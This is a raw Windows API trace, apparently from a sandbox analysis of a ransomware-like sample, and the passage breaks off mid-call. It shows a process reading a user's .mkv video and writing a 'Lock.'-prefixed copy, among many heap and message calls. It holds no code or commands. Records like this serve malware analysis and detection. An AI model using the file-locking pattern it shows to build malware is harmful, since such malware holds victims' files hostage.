[0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0259.009] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0259.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/S8aFA8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\s8afa8f.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0259.010] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0259.010] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0259.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.010] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.010] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0259.011] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.S8aFA8f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.s8afa8f.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0259.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0259.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0259.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.011] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.011] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0259.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0259.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0259.012] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.012] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0259.012] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0259.014] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x73f7, lpOverlapped=0x0) returned 1 [0259.014] ReadFile (in: hFile=0x268, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0259.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x173f7) returned 0x24b7a48 [0259.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0259.015] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0259.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0259.015] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0259.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0259.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bf8 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x173f7) returned 0x24b7a48 [0259.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0259.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1888 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0259.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1878 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16f8 [0259.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0259.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0259.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0259.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x173f7) returned 0x34b2250 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0259.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0259.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0259.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0259.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0259.020] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0259.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0259.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.020] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0259.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0259.021] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0259.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0259.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0259.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.022] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0259.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0259.035] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0259.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0259.035] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0259.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.036] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0259.036] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.036] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0259.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.037] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0259.037] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0259.037] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0259.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.038] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.038] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0259.038] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0259.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0259.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.039] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0259.039] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.039] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0259.039] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0259.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0259.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa688 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.040] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0259.040] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0259.040] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0259.040] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0259.041] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 